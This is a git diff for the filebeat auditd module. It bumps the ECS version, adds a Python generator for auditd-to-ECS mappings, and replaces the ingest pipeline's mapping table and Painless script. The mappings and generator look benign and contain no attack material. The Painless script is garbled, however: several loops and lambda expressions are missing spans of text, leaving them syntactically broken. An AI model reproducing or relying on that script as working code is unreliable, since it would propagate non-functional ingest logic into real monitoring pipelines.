"eJzsWk+P27YTve+nGOR3+fUQNaceXKBAgTRAgDQF2vTQ04ImRzKxFEchR/aqn74gJfmPTNkW10Eu68MCK5vz3hs+kjO038ITdisQrdKsHgBYs8EVvPk1PnjzAKDQS6cb1mRX8MsDAMDvpFqDUJKDRjivbTUEAEOVLx4A/IYcP0qypa5WwK7FB4BSo1F+9RBjvAUralxB69HFBwDcNbiCylHbDE9ORhyPYnS1tsLs3xhHP2G3I6eOnif4j68vQxQgB8wdKNxqiUAWdhstN8AbjPxAe2jQlRQ+XsXHtPbotqhASNZbzV1xTjLm5Izhsb5jjcfExghanTyeF3lFaHj9YTHorFvDujEIrdVfWwSt0LIuNToPVO4lF0k+4e8CRvgs6ibYSZg1Ol7G969goYgYaBuqtD0lmGQYs1vcM29/T/MUfR9oRKzglvCP7zxj/WNjBAefpPPXs1uYxSv8wutzzFJ5YJVwI5YlBq/iVUeeAP42DhtWgg3qRHivuGjiGQvPC72E+vF9kQh9lse84CFMKvw0LXPpmo3e+2MmY99q4U/hT1OXvZQvYvQZPHNcqQ32y+J1E/xWm2CK4OseOLcH0s7uqw14NeOrGb+nGb3Yono146sZv5cZT/oUNduEzSB8iMaE0lEdI086QEh4dwQ0VC0rQk91TZE/ads+9/ghdAGfiUEYM+CDcAiKZFujZVSwQYewRilaPykfN9j1H+6sqLUEYRVshetg3Q3hcYuWI+PL1e/RkWPUo2jPLHdl2j7sPR0RPfBG+9CGxt7TqIHOx/fB7GrvuVjPNk6Hf+ksaIwRo84sX9zdm6rF3Z5qAV9GmwTiUlhYY88/RdYJiVC23DrcR6aDyvAIdDS1dsP64w7kRtgKPfzf6KfpMoIw6xRbeEfEP6SzECbMo7/zfHn0XpP9BjN2X65hwg5cC/jIk4kC1gjiLGjUwTSZsHV3HCwpwePXFq1Mb3mGbLVM3MFi/VIdw4Nt6/XcsaAZ64VJDDh9yLCzxgCgLYghqfM4y2HCqH6LAW2VloLRDxdU8S1qedzdmViYKa8iEVX78VPaw7/o6O1aeFQ/g4CtMG08Lt5BjcJ60Dyao9TOcwya1sfcLTq5Sm31rPIv/0A7XMgd38O51tqwghtHlRO1h2lbvT/V3i1PdS9QuCqeFeN+0x/eIIUxM1BKuaRw3SzS/CfWxBjDoQ8pF3yiXZK1ofG2VTz80mRcQ2e11IXVdAOfJlZaF9aPuVcCPpEM/kXekXsa8zCDeT+ZPWpSZXq6pUwjC6PFdB9pBG/6W+5UZVfryome13BJfg7XzNSr82iNIxkSdz7yJrwXAOYhurMj7Bpgv8lSy5KycupQklOPASYLWcgAkAFcIZ2tiblrxXRheRxNkmVt0fJjwluX1RwUeWqdxKJCKq7GuyTxlFhr2XWP2tOjJHUXalcj3krOkBSJ6csgdSHSrWQcVprsnebvcrCbJ09zdy9DXQi1MEP3s9L1gHPUTj76v7ERXaOhHexCW2mJ+8MGQ7EGPxXPsG65f8+zNgbWGKsXalojGNVMQeHkZuG+tCHPRRinGWWowXM2p8UbfzzXZm5VbkE87zZvQszCEpnyYjvxEpGJnnoBcBZk6TPFHr6zeYni0mdKPoLPAsZM2fsvR1+iGjNFH8CzYHOnOt4/v0Rv7iT3wFmQlKk1fvHzEq2UqbUHzoKUVE9vC26twzM7DXxeWg2PgPiMsmWxNjmwiR/z3JzfmbG3wNZ+2iZeQ6zRe1HlSPROLsQa6pWhB86AVH5pk6rQs7b9LxVuw/0vAAD//zgi5vg=" + return "eJzsWk+P27YTvftTDPK7/HqImlMPLlCgQBEgQJoC7fbQ04ImRzKxFEchh/aqn74gJfmvZFtcB7nYhwAri/Pem3kkh3Tewwu2SxBBaVYLANZscAnvfk0P3i0AFHrpdMOa7BJ+WQAA/E4qGISSHDTCeW2rPgAYqnyxAPBrcvwsyZa6WgK7gAuAUqNRfrlIMd6DFTUuIXh06QEAtw0uoXIUmv7J0YjDUYyu1laY3RfD6Bdst+TUwfMR/sPnqY8C5IC5BYUbLRHIwnat5Rp4jYkfaA8NupLi61V6TCuPboMKhGS90dwW5yRTTs4YHuo71HhIbIig1dHjaZFXhMbPHxajzjoY1o1BCFZ/DQhaoWVdanQeqNxJLkb5xH9nMMJXUTfRTsKs0PE8vn9FCyXESNtQpe0xwVGGKbvFPfP292meku8jjYQV3RL/8K1nrH9sjODok/H8dexmZvEKv/j5krJU7lkVi3M7ltpgx/LhyW/lyTGCD0sOljzFpq3dLf7wMOPDjN/TjF5sUD3M+DDj9zLjUduoJnviCYSPyZhQOqpT5JOGHEa8OwAaqq76/oKuU+TP2obXDj+GLuALMQhjenwQDkGRDDVaRgVrdAgrlCL440TzGtvu5daKWksQVsFGuBZWbR8eN2g5MS5unKNk1LMIZ5a7UraPO08nRA+81j6eCtJRwKiezqffotnVznPp7NA4Hf+ks6ApRoo6MX1xe2+qFrc7qgU8DTaJxKWwsMKO/xhZJyRCGTg43EWmvcr4CHQytXb9/OMW5FrYCj383+iX02kEseqUTlSOiH8Yz0IsmEd/53p59F6T/QYVuy/XWLA91wI+8UmhgDWCOAuadDCdFGzVHgYbleDxa0Arx5c8Q7aaJ25vsW6qDuHBhno1tS1oxnpmEiNOFzKurCkAaAuiT+o0znyYOKpbYkBbpaVg9P19QfqKAg+rOxMLc8qrGImq/fCW9vAvOnq/Eh7VzyBgI0xI28UHqFFYD5oHc5TaeU5Bx/Uxt7N2rlJbPan86R8I/f3I4bWIC9bGGdw4qpyoPdDE3BAf5qe6EyhclfaKYb3pNm+QwpgJKKXcqHDdzNL8J9bEmMKhjykXfKRdkrUoOcqPm984GdfQWS91YTbdwKdJndaF+WPulYDPJKN/kbfkXoY8TGDeT2aHOqpyvNxSjiMLo8XpOtIIXneXjmOdXa0rJzpe/Z3lOVwz0a9OozWOZEzc+cib8N4AmIfozrawa4DdIkuBJWXl1KEkp54jTBaykBEgA7hCOpsT4w0wTDSWh9EkWdYWLT+PeOuymr0iT8FJLCqk4mq8SxKPiQXLrn3Wnp4lqbtQuxrxVnKGpBgpXwapC5FuJeOw0mTvVL/LwW4unub2Xoa6EGpmhu5npesBp6gdvfq/4SC6QkNb2MZjpSXuNhuMzRr8VLzCKnD3nWdtDKwwdS/UBCMY1URD4eR65rq0Js9FHKcZZezBcxan2Qt/2tcmblVuQTw/bd6EmIUlMuWl48RbRI6cqWcAZ0GWPlPs/jebtygufabkA/gsYMyUjWUZG+sNvkU1Zoreg2fB5pY63T+/RW9ukTvgLEjK1Jp++HmLVsrU2gFnQUqqT28Lbu3DM08a+Dq3Gx4A8RVlYLEyObAj/7fi5vxOjL0Ftvanx8RriDV6L6ocid7JmVh9v9KfgTMglZ97SFXoWdsU90bc/wIAAP//+a0+9A==" } diff --git a/filebeat/module/auditd/log/config/log.yml b/filebeat/module/auditd/log/config/log.yml index 6fcf0ab7a1f6..2db4213af7b4 100644 --- a/filebeat/module/auditd/log/config/log.yml +++ b/filebeat/module/auditd/log/config/log.yml @@ -8,4 +8,4 @@ processors: - add_fields: target: '' fields: - ecs.version: 1.7.0 + ecs.version: 1.8.0 diff --git a/filebeat/module/auditd/log/ingest/gen-ecs-mappings.py b/filebeat/module/auditd/log/ingest/gen-ecs-mappings.py new file mode 100644 index 000000000000..55dba3880852 --- /dev/null +++ b/filebeat/module/auditd/log/ingest/gen-ecs-mappings.py @@ -0,0 +1,176 @@ +#!/usr/bin/env python3 + +# This script generates auditd to ECS mappings from github.com/elastic/go-libaudit +# +# Usage: ./gen-ecs-mappings.py ~/go/src/github.com/elastic/go-libaudit +# +# It will output to stdout the `params` section for the script processor in the ingest pipeline. +import copy +import os +import sys +import yaml +from collections import defaultdict +from shlex import quote +from subprocess import check_call, call, check_output + + +def extract_object(name: str, source: dict) -> dict: + r = {} + for k, v in source.items(): + if k == 'primary' or k == 'secondary': + r[name + '.' + k] = v + elif k == 'what' or k == 'path_index' or k == 'how': + pass + else: + raise Exception('Unexpected object key: ' + k) + return r + + +def map_object(instance: dict, context: str, mappings: dict): + for k, v in instance.items(): + if k not in mappings: + raise Exception('Unexpected key "{}" while parsing {}'.format(k, context)) + mappings[k](k, v) + + +def convert_mappings(m: dict) -> dict: + event = {} + objects = { + # Default values for subject (actor), may be overridden. + 'subject.primary': ['auid'], + 'subject.secondary': ['uid'], + } + extra = {} # TODO: Unused (sets client.ip) + mappings = [] + has_fields = [] + + def store_condition(k: str, v: list): + nonlocal has_fields + has_fields = v + + def store_event(k: str, v: list): + if not isinstance(v, list): + v = [v] + event[k] = v + + def ignore(k, v): + pass + + def make_store_field(name: str): + def store(k: str, v: any): + extra[name] = v + return store + + def store_ecs(k: str, v: dict): + def store_mappings(k: str, v: list): + if not isinstance(v, list): + raise Exception('ecs.mappings must be a list, not ' + repr(v)) + nonlocal mappings + mappings = v + + map_object(v, 'ecs', { + 'type': store_event, + 'category': store_event, + 'mappings': store_mappings, + }) + + def store_entity(basek: str, basev: dict): + def save(k: str, v: any): + if not isinstance(v, list): + v = [v] + objects[basek + '.' + k] = v + + map_object(basev, basek, { + **dict.fromkeys(['primary', 'secondary'], save), + **dict.fromkeys(['what', 'path_index'], ignore) + }) + + map_object(m, 'mapping', { + 'action': store_event, + 'ecs': store_ecs, + 'source_ip': make_store_field('source.ip'), + 'has_fields': store_condition, + **dict.fromkeys(['object', 'subject'], store_entity), + **dict.fromkeys(['syscalls', 'record_types', 'how', 'description'], ignore), + }) + d = { + 'event': event, + } + + if len(mappings) > 0: + d['copy'] = [] + for mp in mappings: + ref = mp['from'] + if ref in objects: + source = objects[ref] + else: + parts = ref.split('.') + if len(parts) != 2: + raise Exception("Don't know how to apply ecs mapping for {}".format(ref)) + if parts[0] == 'uid' or parts[0] == 'data': + source = [parts[1]] + else: + raise Exception("Don't know how to apply ecs mapping for {}".format(ref)) + d['copy'].append({ + 'from': source, + 'to': mp['to'] + }) + + if len(has_fields) > 0: + d['has_fields'] = has_fields + return d + + +class DefaultDict(defaultdict): + def __init__(self, factory): + super(DefaultDict, self).__init__(factory) + + def append(self, keys, obj): + if isinstance(keys, str): + keys = [keys] + for key in keys: + self[key].append(copy.deepcopy(obj)) + + +if __name__ == '__main__': + if len(sys.argv) != 2: + print('Usage: {} '.format(sys.argv[0])) + sys.exit(1) + repo_path = sys.argv[1] + if not os.path.isdir(repo_path): + raise Exception('Path to go-libaudit is not a directory: ' + repo_path) + git_path = repo_path + "/.git" + if not os.path.isdir(git_path): + raise Exception('go-libaudit directory doesn\'t contain a git repository: ' + git_path) + norms_path = repo_path + "/aucoalesce/normalizations.yaml" + if not os.path.isfile(norms_path): + raise Exception('go-libaudit repository doesn\'t contain the normalizations file: ' + norms_path) + revision = check_output('git --work-tree={} --git-dir={} describe --tags'.format(quote(repo_path), + quote(git_path)), shell=True).decode('utf8').strip() + with open(norms_path, 'r') as f: + norms = yaml.full_load(f) + types = DefaultDict(list) + syscalls = DefaultDict(list) + for entry in norms['normalizations']: + proto = convert_mappings(entry) + # TODO: Correctly check for emptyness (condition field?) + if len(proto) == 0: + continue + if 'syscalls' in entry: + syscalls.append(entry['syscalls'], proto) + + if 'record_types' in entry: + types.append(entry['record_types'], proto) + +if 'SYSCALL' in types: + raise Exception('SYSCALL cannot be specified in record_types') + +print('# Auditd record type to ECS mappings') +print('# AUTOGENERATED FROM go-libaudit {}, DO NOT EDIT'.format(revision)) +yaml.safe_dump({ + 'params': { + 'types': dict(types), + 'syscalls': dict(syscalls), + } +}, sys.stdout) +print('# END OF AUTOGENERATED') diff --git a/filebeat/module/auditd/log/ingest/pipeline.yml b/filebeat/module/auditd/log/ingest/pipeline.yml index 13f91a4b38b0..826761837d52 100644 --- a/filebeat/module/auditd/log/ingest/pipeline.yml +++ b/filebeat/module/auditd/log/ingest/pipeline.yml @@ -27,18 +27,13 @@ processors: target_field: auditd.log - kv: field: auditd.log.sub_kv - field_split: "\\s+" + field_split: "\\s+(?=[^\\s]+=)" value_split: "=" target_field: auditd.log ignore_missing: true -- remove: - field: auditd.log.kv - ignore_failure: true -- remove: - field: auditd.log.sub_kv - ignore_failure: true -- remove: +- rename: field: message + target_field: event.original ignore_failure: true - date: field: auditd.log.epoch @@ -46,9 +41,6 @@ processors: formats: - UNIX ignore_failure: true -- remove: - field: auditd.log.epoch - ignore_failure: true - rename: ignore_failure: true field: auditd.log.old-auid @@ -179,83 +171,1743 @@ processors: - script: lang: painless ignore_failure: true + # Auditd record type to ECS mappings + # AUTOGENERATED FROM go-libaudit v2.2.0, DO NOT EDIT params: - CONFIG_CHANGE: - category: - - configuration - type: - - change - DAEMON_CONFIG: - category: - - configuration - type: - - change - DAEMON_RECONFIG: - category: - - configuration - type: - - info - USYS_CONFIG: - category: - - configuration - type: - - change - NETFILTER_CFG: - category: - - configuration - type: - - change - FEATURE_CHANGE: - category: - - configuration - type: - - change - MAC_CONFIG_CHANGE: - category: - - configuration - type: - - change - MAC_POLICY_LOAD: - category: - - configuration - type: - - access - MAC_STATUS: - category: - - configuration - type: - - change - USER_MAC_CONFIG_CHANGE: - category: - - configuration - type: - - change - USER_MAC_POLICY_LOAD: - category: - - configuration - type: - - access - USER_AUTH: - category: - - authentication - type: - - info - KERN_MODULE: - category: - - driver - type: - - info - SOFTWARE_UPDATE: - category: - - package - type: - - info + syscalls: + '*': + - event: + category: + - process + type: + - info + accept: + - event: + action: + - accepted-connection-from + category: + - network + type: + - connection + - start + accept4: + - event: + action: + - accepted-connection-from + category: + - network + type: + - connection + - start + access: + - event: + action: + - checked-metadata-of + category: + - file + type: + - info + adjtimex: + - event: + action: + - changed-system-time + category: + - host + type: + - change + bind: + - event: + action: + - bound-socket + category: + - network + type: + - start + brk: + - event: + action: + - allocated-memory + category: + - process + type: + - info + chmod: + - event: + action: + - changed-file-permissions-of + category: + - file + type: + - change + chown: + - event: + action: + - changed-file-ownership-of + category: + - file + type: + - change + clock_settime: + - event: + action: + - changed-system-time + category: + - host + type: + - change + connect: + - event: + action: + - connected-to + category: + - network + type: + - connection + - start + creat: + - event: + action: + - opened-file + category: + - file + type: + - creation + delete_module: + - event: + action: + - unloaded-kernel-module + category: + - driver + type: + - end + execve: + - event: + action: + - executed + category: + - process + type: + - start + execveat: + - event: + action: + - executed + category: + - process + type: + - start + faccessat: + - event: + action: + - checked-metadata-of + category: + - file + type: + - info + fallocate: + - event: + action: + - opened-file + category: + - file + type: + - change + fchmod: + - event: + action: + - changed-file-permissions-of + category: + - file + type: + - change + fchmodat: + - event: + action: + - changed-file-permissions-of + category: + - file + type: + - change + fchown: + - event: + action: + - changed-file-ownership-of + category: + - file + type: + - change + fchownat: + - event: + action: + - changed-file-ownership-of + category: + - file + type: + - change + fgetxattr: + - event: + action: + - checked-metadata-of + category: + - file + type: + - info + finit_module: + - event: + action: + - loaded-kernel-module + category: + - driver + type: + - start + fremovexattr: + - event: + action: + - changed-file-attributes-of + category: + - file + type: + - change + fsetxattr: + - event: + action: + - changed-file-attributes-of + category: + - file + type: + - change + fstat: + - event: + action: + - checked-metadata-of + category: + - file + type: + - info + fstatat: + - event: + action: + - checked-metadata-of + category: + - file + type: + - info + fstatfs: + - event: + action: + - checked-filesystem-metadata-of + category: + - file + type: + - info + ftruncate: + - event: + action: + - opened-file + category: + - file + type: + - change + futimens: + - event: + action: + - changed-timestamp-of + category: + - file + type: + - info + futimesat: + - event: + action: + - changed-timestamp-of + category: + - file + type: + - info + getxattr: + - event: + action: + - checked-metadata-of + category: + - file + type: + - info + init_module: + - event: + action: + - loaded-kernel-module + category: + - driver + type: + - start + kill: + - event: + action: + - killed-pid + category: + - process + type: + - end + lchown: + - event: + action: + - changed-file-ownership-of + category: + - file + type: + - change + lgetxattr: + - event: + action: + - checked-metadata-of + category: + - file + type: + - info + listen: + - event: + action: + - listen-for-connections + category: + - network + type: + - start + lremovexattr: + - event: + action: + - changed-file-attributes-of + category: + - file + type: + - change + lsetxattr: + - event: + action: + - changed-file-attributes-of + category: + - file + type: + - change + lstat: + - event: + action: + - checked-metadata-of + category: + - file + type: + - info + mkdir: + - event: + action: + - created-directory + category: + - file + type: + - creation + mkdirat: + - event: + action: + - created-directory + category: + - file + type: + - creation + mknod: + - event: + action: + - make-device + category: + - file + type: + - creation + mknodat: + - event: + action: + - make-device + category: + - file + type: + - creation + mmap: + - event: + action: + - allocated-memory + category: + - process + type: + - info + mmap2: + - event: + action: + - allocated-memory + category: + - process + type: + - info + mount: + - event: + action: + - mounted + category: + - file + type: + - creation + newfstatat: + - event: + action: + - checked-metadata-of + category: + - file + type: + - info + open: + - event: + action: + - opened-file + category: + - file + type: + - info + openat: + - event: + action: + - opened-file + category: + - file + type: + - info + read: + - event: + action: + - read-file + category: + - file + type: + - info + readlink: + - event: + action: + - opened-file + category: + - file + type: + - info + readlinkat: + - event: + action: + - opened-file + category: + - file + type: + - info + recv: + - event: + action: + - received-from + category: + - network + type: + - connection + - info + recvfrom: + - event: + action: + - received-from + category: + - network + type: + - connection + - info + recvmmsg: + - event: + action: + - received-from + category: + - network + type: + - connection + - info + recvmsg: + - event: + action: + - received-from + category: + - network + type: + - connection + - info + removexattr: + - event: + action: + - changed-file-attributes-of + category: + - file + type: + - change + rename: + - event: + action: + - renamed + category: + - file + type: + - change + renameat: + - event: + action: + - renamed + category: + - file + type: + - change + renameat2: + - event: + action: + - renamed + category: + - file + type: + - change + rmdir: + - event: + action: + - deleted + category: + - file + type: + - deletion + sched_setattr: + - event: + action: + - adjusted-scheduling-policy-of + category: + - process + type: + - change + sched_setparam: + - event: + action: + - adjusted-scheduling-policy-of + category: + - process + type: + - change + sched_setscheduler: + - event: + action: + - adjusted-scheduling-policy-of + category: + - process + type: + - change + send: + - event: + action: + - sent-to + category: + - network + type: + - connection + - info + sendmmsg: + - event: + action: + - sent-to + category: + - network + type: + - connection + - info + sendmsg: + - event: + action: + - sent-to + category: + - network + type: + - connection + - info + sendto: + - event: + action: + - sent-to + category: + - network + type: + - connection + - info + setdomainname: + - event: + action: + - changed-system-name + category: + - host + type: + - change + setegid: + - event: + action: + - changed-identity-of + category: + - process + type: + - change + seteuid: + - event: + action: + - changed-identity-of + category: + - process + type: + - change + setfsgid: + - event: + action: + - changed-identity-of + category: + - process + type: + - change + setfsuid: + - event: + action: + - changed-identity-of + category: + - process + type: + - change + setgid: + - event: + action: + - changed-identity-of + category: + - process + type: + - change + sethostname: + - event: + action: + - changed-system-name + category: + - host + type: + - change + setregid: + - event: + action: + - changed-identity-of + category: + - process + type: + - change + setresgid: + - event: + action: + - changed-identity-of + category: + - process + type: + - change + setresuid: + - event: + action: + - changed-identity-of + category: + - process + type: + - change + setreuid: + - event: + action: + - changed-identity-of + category: + - process + type: + - change + settimeofday: + - event: + action: + - changed-system-time + category: + - host + type: + - change + setuid: + - event: + action: + - changed-identity-of + category: + - process + type: + - change + setxattr: + - event: + action: + - changed-file-attributes-of + category: + - file + type: + - change + stat: + - event: + action: + - checked-metadata-of + category: + - file + type: + - info + stat64: + - event: + action: + - checked-metadata-of + category: + - file + type: + - info + statfs: + - event: + action: + - checked-filesystem-metadata-of + category: + - file + type: + - info + stime: + - event: + action: + - changed-system-time + category: + - host + type: + - change + symlink: + - event: + action: + - symlinked + category: + - file + type: + - creation + symlinkat: + - event: + action: + - symlinked + category: + - file + type: + - creation + tgkill: + - event: + action: + - killed-pid + category: + - process + type: + - end + tkill: + - event: + action: + - killed-pid + category: + - process + type: + - end + truncate: + - event: + action: + - opened-file + category: + - file + type: + - change + umount: + - event: + action: + - unmounted + category: + - file + type: + - deletion + umount2: + - event: + action: + - unmounted + category: + - file + type: + - deletion + unlink: + - event: + action: + - deleted + category: + - file + type: + - deletion + unlinkat: + - event: + action: + - deleted + category: + - file + type: + - deletion + utime: + - event: + action: + - changed-timestamp-of + category: + - file + type: + - info + utimensat: + - event: + action: + - changed-timestamp-of + category: + - file + type: + - info + utimes: + - event: + action: + - changed-timestamp-of + category: + - file + type: + - info + write: + - event: + action: + - wrote-to-file + category: + - file + type: + - change + types: + ACCT_LOCK: + - event: + action: + - locked-account + category: + - iam + type: + - user + - info + ACCT_UNLOCK: + - event: + action: + - unlocked-account + category: + - iam + type: + - user + - info + ADD_GROUP: + - copy: + - from: + - auid + to: user + - from: + - uid + to: user.effective + - from: + - id + - acct + to: group + event: + action: + - added-group-account-to + category: + - iam + type: + - group + - creation + ADD_USER: + - copy: + - from: + - auid + to: user + - from: + - uid + to: user.effective + - from: + - id + - acct + to: user.target + event: + action: + - added-user-account + category: + - iam + type: + - user + - creation + ANOM_ABEND: + - event: + action: + - crashed-program + category: + - process + type: + - end + ANOM_EXEC: + - event: + action: + - attempted-execution-of-forbidden-program + category: + - process + type: + - start + ANOM_LINK: + - event: + action: + - used-suspicious-link + ANOM_LOGIN_FAILURES: + - event: + action: + - failed-log-in-too-many-times-to + ANOM_LOGIN_LOCATION: + - event: + action: + - attempted-log-in-from-unusual-place-to + ANOM_LOGIN_SESSIONS: + - event: + action: + - opened-too-many-sessions-to + ANOM_LOGIN_TIME: + - event: + action: + - attempted-log-in-during-unusual-hour-to + ANOM_PROMISCUOUS: + - event: + action: + - changed-promiscuous-mode-on-device + ANOM_RBAC_INTEGRITY_FAIL: + - event: + action: + - tested-file-system-integrity-of + AVC: + - event: + action: + - violated-selinux-policy + has_fields: + - seresult + - event: + action: + - violated-apparmor-policy + has_fields: + - apparmor + CHGRP_ID: + - event: + action: + - changed-group + category: + - process + type: + - change + CHUSER_ID: + - event: + action: + - changed-user-id + category: + - process + type: + - change + CONFIG_CHANGE: + - event: + action: + - changed-audit-configuration + category: + - process + - configuration + type: + - change + CRED_ACQ: + - copy: + - from: + - auid + to: user + - from: + - acct + - id + - uid + to: user.effective + event: + action: + - acquired-credentials + category: + - authentication + type: + - info + CRED_DISP: + - copy: + - from: + - auid + to: user + - from: + - acct + - id + - uid + to: user.effective + event: + action: + - disposed-credentials + category: + - authentication + type: + - info + CRED_REFR: + - copy: + - from: + - auid + to: user + - from: + - acct + - id + - uid + to: user.effective + event: + action: + - refreshed-credentials + category: + - authentication + type: + - info + CRYPTO_KEY_USER: + - event: + action: + - negotiated-crypto-key + category: + - process + type: + - info + CRYPTO_LOGIN: + - event: + action: + - crypto-officer-logged-in + CRYPTO_LOGOUT: + - event: + action: + - crypto-officer-logged-out + category: + - process + type: + - info + CRYPTO_SESSION: + - event: + action: + - started-crypto-session + category: + - process + type: + - info + DAC_CHECK: + - event: + action: + - access-result + DAEMON_ABORT: + - event: + action: + - aborted-auditd-startup + category: + - process + type: + - stop + DAEMON_ACCEPT: + - event: + action: + - remote-audit-connected + category: + - network + type: + - connection + - start + DAEMON_CLOSE: + - event: + action: + - remote-audit-disconnected + category: + - network + type: + - connection + - start + DAEMON_CONFIG: + - event: + action: + - changed-auditd-configuration + category: + - process + - configuration + type: + - change + DAEMON_END: + - event: + action: + - shutdown-audit + category: + - process + type: + - stop + DAEMON_ERR: + - event: + action: + - audit-error + category: + - process + type: + - info + DAEMON_RECONFIG: + - event: + action: + - reconfigured-auditd + category: + - process + - configuration + type: + - info + DAEMON_RESUME: + - event: + action: + - resumed-audit-logging + category: + - process + type: + - change + DAEMON_ROTATE: + - event: + action: + - rotated-audit-logs + category: + - process + type: + - change + DAEMON_START: + - event: + action: + - started-audit + category: + - process + type: + - start + DEL_GROUP: + - copy: + - from: + - auid + to: user + - from: + - uid + to: user.effective + - from: + - id + - acct + to: group + event: + action: + - deleted-group-account-from + category: + - iam + type: + - group + - deletion + DEL_USER: + - copy: + - from: + - auid + to: user + - from: + - uid + to: user.effective + - from: + - id + - acct + to: user.target + event: + action: + - deleted-user-account + category: + - iam + type: + - user + - deletion + FEATURE_CHANGE: + - event: + action: + - changed-audit-feature + category: + - configuration + type: + - change + FS_RELABEL: + - event: + action: + - relabeled-filesystem + GRP_AUTH: + - copy: + - from: + - auid + to: user + - from: + - uid + to: user.effective + event: + action: + - authenticated-to-group + category: + - authentication + type: + - info + GRP_CHAUTHTOK: + - copy: + - from: + - auid + to: user + - from: + - uid + to: user.effective + - from: + - acct + - id + - uid + to: group + event: + action: + - changed-group-password + category: + - iam + type: + - group + - change + GRP_MGMT: + - copy: + - from: + - auid + to: user + - from: + - uid + to: group + - from: + - uid + to: user.effective + event: + action: + - modified-group-account + category: + - iam + type: + - group + - change + KERNEL: + - event: + action: + - initialized-audit-subsystem + category: + - process + type: + - info + KERN_MODULE: + - event: + action: + - loaded-kernel-module + category: + - driver + type: + - start + LABEL_LEVEL_CHANGE: + - event: + action: + - modified-level-of + LABEL_OVERRIDE: + - event: + action: + - overrode-label-of + LOGIN: + - copy: + - from: + - old_auid + - old-auid + to: user + - from: + - new-auid + - new_auid + - auid + to: user.effective + event: + action: + - changed-login-id-to + category: + - authentication + type: + - start + MAC_CHECK: + - event: + action: + - mac-permission + MAC_CONFIG_CHANGE: + - event: + action: + - changed-selinux-boolean + category: + - configuration + type: + - change + MAC_POLICY_LOAD: + - event: + action: + - loaded-selinux-policy + category: + - configuration + type: + - access + MAC_STATUS: + - event: + action: + - changed-selinux-enforcement + category: + - configuration + type: + - change + NETFILTER_CFG: + - event: + action: + - loaded-firewall-rule-to + category: + - configuration + type: + - change + ROLE_ASSIGN: + - event: + action: + - assigned-user-role-to + category: + - iam + type: + - user + - change + ROLE_MODIFY: + - event: + action: + - modified-role + category: + - iam + type: + - change + ROLE_REMOVE: + - event: + action: + - removed-user-role-from + category: + - iam + type: + - user + - change + SECCOMP: + - event: + action: + - violated-seccomp-policy + SELINUX_ERR: + - event: + action: + - caused-mac-policy-error + SERVICE_START: + - event: + action: + - started-service + category: + - process + type: + - start + SERVICE_STOP: + - event: + action: + - stopped-service + category: + - process + type: + - stop + SOFTWARE_UPDATE: + - event: + action: + - package-updated + category: + - package + type: + - info + SYSTEM_BOOT: + - event: + action: + - booted-system + category: + - host + type: + - start + SYSTEM_RUNLEVEL: + - event: + action: + - changed-to-runlevel + category: + - host + type: + - change + SYSTEM_SHUTDOWN: + - event: + action: + - shutdown-system + category: + - host + type: + - end + TEST: + - event: + action: + - sent-test + category: + - process + type: + - info + TRUSTED_APP: + - event: + action: + - unknown + category: + - process + type: + - info + TTY: + - event: + action: + - typed + USER: + - event: + action: + - sent-message + USER_ACCT: + - copy: + - from: + - auid + to: user + - from: + - acct + - id + - uid + to: user.effective + event: + action: + - was-authorized + category: + - authentication + type: + - info + USER_AUTH: + - copy: + - from: + - auid + to: user + - from: + - acct + - id + - uid + to: user.effective + event: + action: + - authenticated + category: + - authentication + type: + - info + USER_AVC: + - event: + action: + - access-permission + USER_CHAUTHTOK: + - copy: + - from: + - auid + to: user + - from: + - uid + to: user.effective + - from: + - acct + - id + - uid + to: user.target + event: + action: + - changed-password + category: + - iam + type: + - user + - change + USER_CMD: + - event: + action: + - ran-command + category: + - process + type: + - start + USER_END: + - copy: + - from: + - auid + to: user + - from: + - acct + - id + - uid + to: user.effective + event: + action: + - ended-session + category: + - session + type: + - end + USER_ERR: + - copy: + - from: + - auid + to: user + - from: + - acct + - id + - uid + to: user.effective + event: + action: + - error + category: + - authentication + type: + - info + USER_LOGIN: + - copy: + - from: + - auid + to: user + - from: + - acct + - id + - uid + to: user.effective + event: + action: + - logged-in + category: + - authentication + type: + - start + USER_LOGOUT: + - copy: + - from: + - auid + to: user + - from: + - acct + - id + - uid + to: user.effective + event: + action: + - logged-out + category: + - authentication + type: + - end + USER_MAC_CONFIG_CHANGE: + - event: + action: + - changed-mac-configuration + category: + - configuration + type: + - change + USER_MAC_POLICY_LOAD: + - event: + action: + - loaded-mac-policy + category: + - configuration + type: + - access + USER_MGMT: + - copy: + - from: + - auid + to: user + - from: + - acct + - id + - uid + to: user.target + - from: + - uid + to: user.effective + event: + action: + - modified-user-account + category: + - iam + type: + - user + - change + USER_ROLE_CHANGE: + - event: + action: + - changed-role-to + USER_SELINUX_ERR: + - event: + action: + - access-error + USER_START: + - copy: + - from: + - auid + to: user + - from: + - acct + - id + - uid + to: user.effective + event: + action: + - started-session + category: + - session + type: + - start + USER_TTY: + - event: + action: + - typed + USYS_CONFIG: + - event: + action: + - changed-configuration + category: + - configuration + type: + - change + VIRT_CONTROL: + - event: + action: + - issued-vm-control + category: + - host + type: + - info + VIRT_CREATE: + - event: + action: + - created-vm-image + category: + - host + type: + - info + VIRT_DESTROY: + - event: + action: + - deleted-vm-image + category: + - host + type: + - info + VIRT_INTEGRITY_CHECK: + - event: + action: + - checked-integrity-of + category: + - host + type: + - info + VIRT_MACHINE_ID: + - event: + action: + - assigned-vm-id + category: + - host + type: + - info + VIRT_MIGRATE_IN: + - event: + action: + - migrated-vm-from + category: + - host + type: + - info + VIRT_MIGRATE_OUT: + - event: + action: + - migrated-vm-to + category: + - host + type: + - info + VIRT_RESOURCE: + - event: + action: + - assigned-vm-resource + category: + - host + type: + - info + # END OF AUTOGENERATED source: >- - if (ctx?.auditd?.log.record_type == null) { + boolean hasFields(HashMap base, def list) { + if (list == null) return true; + for (int i=0; i ctx.event[k] = v); + HashMap base = ctx.auditd.log; + def acts = params.types.get(base.record_type); + if (acts == null && base.syscall != null) { + acts = params.syscalls.get(base?.syscall); + if (acts == null) acts = params.syscalls.get('*'); + } + if (acts == null) return; + def act = null; + for (int i=0; act == null && i ctx.event[k] = v); + } + if (act?.copy != null) { + List lst = new ArrayList(); + for(int i=0; i 0) { + ctx.auditd.log["copy"] = lst; + } + } +- foreach: + field: auditd.log.copy + ignore_missing: true + processor: + set: + field: "{{_ingest._value.target}}" + value: "{{_ingest._value.value}}" - set: if: "ctx.auditd.log?.record_type == 'SYSTEM_BOOT' || ctx.auditd.log?.record_type == 'SYSTEM_SHUTDOWN'" field: event.category @@ -499,6 +2151,14 @@ processors: field: source.as.organization_name target_field: source.as.organization.name ignore_missing: true +- remove: + field: + - auditd.log.kv + - 